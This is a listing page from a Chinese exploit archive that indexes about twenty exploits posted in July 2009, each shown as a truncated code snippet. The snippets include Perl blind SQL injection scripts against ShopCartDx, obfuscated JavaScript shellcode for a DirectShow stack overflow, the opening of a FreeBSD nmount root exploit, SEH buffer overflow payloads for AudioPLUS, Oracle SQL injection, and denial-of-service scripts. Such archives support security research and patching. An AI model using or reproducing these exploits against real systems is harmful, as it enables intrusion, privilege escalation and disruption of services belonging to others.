首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
热门关键字: shell  88888  art  vitter  linux
  当前位置:主页>安全文章>文章资料>Exploits>列表
Remote blind SQL injection exploit for ShopCartDx version 4.30 that leverages pr
  日期:2009-07-07 10:11:40 点击:34 评论:0
#!/usr/bin/perl#[0-Day] ShopCartDx = v4.30 (products.php) Remote Blind SQL InjectionExploit#Coded By Dante90, WaRWolFz Crew#Bug Discovered By: Dante90, WaRWolFz Crewuse strict;use LWP::UserAgent;use HTTP::Request::Common;use Time::HiRes;use IO::Sock
mail XSS的脚本
  日期:2009-07-06 11:22:34 点击:203 评论:0
#!/usr/bin/perl use Getopt::Std; use Net::SMTP; use strict; =head1 NAME excess - A script for testing webmail systems for cross-site scripting problems =head1 DESCRIPTION This script sends a number of HTML-formatted email messages to a specified emai
Microsoft DirectShow MPEG2TuneRequest Stack Overflow Exploit 2
  日期:2009-07-06 11:21:49 点击:86 评论:0
var appllaa='0'; var nndx='%'+'u9'+'0'+'9'+'0'+'%u'+'9'+'0'+'9'+appllaa; var dashell=unescape(nndx+'%u5858%u5858%u10EB%u4B5B%uC933%uB966%u03B8%u3480%uBD0B%uFAE2%u05EB%uEBE8%uFFFF%u54FF%uBEA3%uBDBD%uD9E2%u8D1C%uBDBD%u36BD%uB1FD%uCD36%u10A1%uD536%u36B
Microsoft DirectShow MPEG2TuneRequest Stack Overflow Exploit
  日期:2009-07-06 11:21:11 点击:50 评论:0
Microsoft DirectShow存在可被远程利用的堆栈溢出漏洞。 关键代码如下: var appllaa='0'; var nndx='%'+'u9'+'0'+'9'+'0'+'%u'+'9'+'0'+'9'+appllaa; var dashell=unescape(nndx+%u03eb%ueb59%ue805%ufff8%uffff%u4937%u4949%u4949%u4949%u4949 + %u4949%u4949%u4949%
Local root exploit for FreeBSD nmount(). This affects FreeBSD 7.0-RELEASE and 7.
  日期:2009-07-06 11:15:41 点击:40 评论:0
/* * cve-2008-3531.c -- Patroklos Argyroudis, argp at domain census-labs.com * * Privilege escalation exploit for the FreeBSD-SA-08:08.nmount * (CVE-2008-3531) vulnerability: * * http://security.freebsd.org/advisories/FreeBSD-SA-08:08.nmount.asc * h
[0-Day] ShopCartDx <= v4.30 (product_detail.php) Remote
  日期:2009-07-06 11:14:54 点击:30 评论:0
#!/usr/bin/perl#[0-Day] ShopCartDx = v4.30 (product_detail.php) Remote Blind SQL InjectionExploit#Coded By Dante90, WaRWolFz Crew#Bug Discovered By: Dante90, WaRWolFz Crewuse strict;use LWP::UserAgent;use HTTP::Request::Common;use Time::HiRes;use IO
[0-Day] ShopCartDx <= v4.30 (product_detail.php) Remote
  日期:2009-07-06 11:14:00 点击:41 评论:0
#!/usr/bin/perl#[0-Day] ShopCartDx = v4.30 (product_detail.php) Remote SQL InjectionExploit#Coded By Dante90, WaRWolFz Crew#Bug Discovered By: Dante90, WaRWolFz Crewuse LWP::UserAgent;use HTTP::Cookies;use strict;my $Member_ID = shift or usage();my
Soulseek versions 157 NS below 13e and all versions of 156 suffer from a remote
  日期:2009-07-06 11:13:19 点击:35 评论:0
Soulseek 157 NS 13e 156.* Remote Peer Search Code Execution=============================================- Release date: July 02, 2009- Discovered by: Laurent Gaffi ; http://g-laurent.blogspot.com/- Severity: critical=================================
Joomla! versions prior to 1.5.12 suffer from multiple cross site scripting vulne
  日期:2009-07-03 11:18:13 点击:46 评论:0
=============================================INTERNET SECURITY AUDITORS ALERT 2009-007- Original release date: June 30th, 2009- Last revised: July 2nd, 2009- Discovered by: Juan Galiana Lara- Severity: 6.8/10 (CVSS Base Score)=======================
win32 xp-sp3 beep and exitprocess shellcode 28 bytes
  日期:2009-07-03 11:17:14 点击:50 评论:0
windows xp-sp3 beep and exitprocess shellcode author Teo Manojlovic contact teo.manojlovic@skole.hr this shellcode is using API call Beep which is in kernel32.dll adress of this API is 7C837A8Fh adress of exitprocess is 7C81CAFAh here is assembler c
Almnzm 2.0 Remote Blind SQL Injection Exploit
  日期:2009-07-03 11:16:04 点击:63 评论:0
?php ini_set(max_execution_time,0); print_r(' || || | || o_,_7 _|| . _o_7 _|| q_|_|| o_///_, ( : / (_) / ( . ___________________ _/QQQQQQQQQQQQQQQQQQQ__ [q] Almnzm 2.0 Blind SQL Inj. __/QQQ/````````````````QQQ___ _/QQQQQ/ QQQQQQ [q] Cookie 3 /Q
YourTube <= 2.0 Arbitrary Database Disclosure Exploit
  日期:2009-07-03 11:14:37 点击:43 评论:0
? //= exploit : YourTube = 2.0 Remote SQL Database Disclosure //= info : http://www.ac4p.com //= DORK: powered by yourtube //= found by: Security Code Team - thanks for sniper code and Qabandi -- //= our home: WwW.Sec-Code.com //= greats 4 our member
Oracle 10g SYS.LT.COMPRESSWORKSPACETREE SQL Injection Exploit
  日期:2009-07-03 11:13:24 点击:40 评论:0
This is slightly modified version of: http://milw0rm.com/exploits/7677 This is based on cursor injection and does not need create function privileges: DECLARE D NUMBER; BEGIN D := DBMS_SQL.OPEN_CURSOR; DBMS_SQL.PARSE(D,'declare pragma autonomous_tra
Apple Safari 4.x JavaScript Reload Remote Crash Exploit
  日期:2009-07-03 11:12:33 点击:48 评论:0
___________________________________________________________________________________ Apple Safari 4.x JavaScript Reload Denial of Service ___________________________________________________________________________________ Author : Marcell 'SkyOut' Di
fipsCMS Light version 2.1 arbitrary database disclosure exploit
  日期:2009-07-02 12:59:28 点击:32 评论:0
#!/usr/bin/perl## fipsCMS Light 2.1 Arbitrary Database Disclosure Exploit## Exploit by d3b4g# script:http://fipsasp.com# Demo: http://demo.fipsasp.com/fipsCMS_light/_fipsdb/db.mdb# From Tiny little island of maldivies#####use LWP::Simple;use LWP::Us
AudioPLUS 2.00.215 (.pls) Local Buffer Overflow Exploit (SEH)
  日期:2009-07-02 12:51:47 点击:25 评论:0
#!/usr/bin/perl # AudioPLUS 2.00.215 (.pls) Local buffer Overflow (seh) print AudioPLUS 2.00.215 (.pls) Local buffer Overflow (seh)n; my $header = [playlist]x0ANumberOfEntries=1x0AFile1=http://; my $junk=x41 x 4103; my $nseh=xEBx06x90x90; my
ARD-9808 DVR Card Security Camera (GET Request) Remote DoS Exploit
  日期:2009-07-02 12:51:11 点击:20 评论:0
import socket import sys print ---------------------------------------------------------------- print ARD-9808 DVR Card Security Camera = Remote Denial Of Service print author: Stack print -------------------------------------------------------------
Green Dam Remote Change System Time Exploit
  日期:2009-07-02 12:50:26 点击:50 评论:0
// Green Dam listen on udp port 1234 and wait for the 4 bytes time value // We can send some bytes to change the time of the dest system // testgreendam[at]gmail.com #include iostream #include boost/asio.hpp #include boost/date_time.hpp int main(int
AudioPLUS 2.00.215 (.lst & .m3u File) Local buffer Overflow (seh)
  日期:2009-07-02 12:49:41 点击:27 评论:0
#!/usr/bin/perl # by hack4love # hack4love@hotmail.com # AudioPLUS 2.00.215 (.m3u / .lst File) Local buffer Overflow (seh) # # Greetz to all my friends # form egypt ## easy :d ## Tested on: Windows XP Pro SP2 (EN) ####################################
Messages Library 2.0 Arbitrary Delete Message Vulnerability
  日期:2009-07-02 12:48:59 点击:25 评论:0
#!/usr/bin/perl -w # Messages Library 2.0 = Arbitrary Delete Message ######################################## #[*] Founded Exploited by : Stack ######################################## print tt#######################################################
共637页/12733条记录 首页 上一页 [441] [442] [443] 444 [445] [446] [447] 下一页 末页
  本月热点文章
 
  本月推荐文章
 
  相关分类
  漏洞检测
  漏洞资料
  入侵实例
  系统安全
  网络安全
  网络基础
  病毒分析
Exploits
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved